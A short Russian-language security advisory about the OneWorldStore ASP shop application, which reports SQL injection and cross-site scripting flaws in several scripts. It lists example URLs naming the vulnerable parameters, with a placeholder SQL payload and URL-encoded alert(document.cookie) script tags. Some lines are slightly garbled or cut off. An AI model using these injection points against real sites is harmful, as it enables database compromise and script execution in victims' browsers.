Программа: OneWorldStore
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения. Уязвимость
существует в нескольких сценариях из-за
недостаточной проверки входных данных.
Удаленный пользователь может выполнить
произвольные SQL команды в базе данных
приложения.
Примеры:
http://[target]/owBasket/owAddItem.asp?idProduct= 'SQL_INJECTION
http://[target]/owListProduct.asp?bSpecials='SQL_INJECTION
http://[tar get]/owListProduct.asp?idCategory='SQL_INJECTION
http://[target]/owProductDetail.asp?idproduct='SQL_INJECTION
http://[target]/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/owContactUs.asp?sAction=Contact&sName= &sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&sType=None+Specified&
http://[target]/owListProduct.asp?bSub='%22%3E%3Cscript %3Ealert(document.cookie)%3C/script%3E&idCategory=64
http://example.com/owListProduct.asp?bSub=;
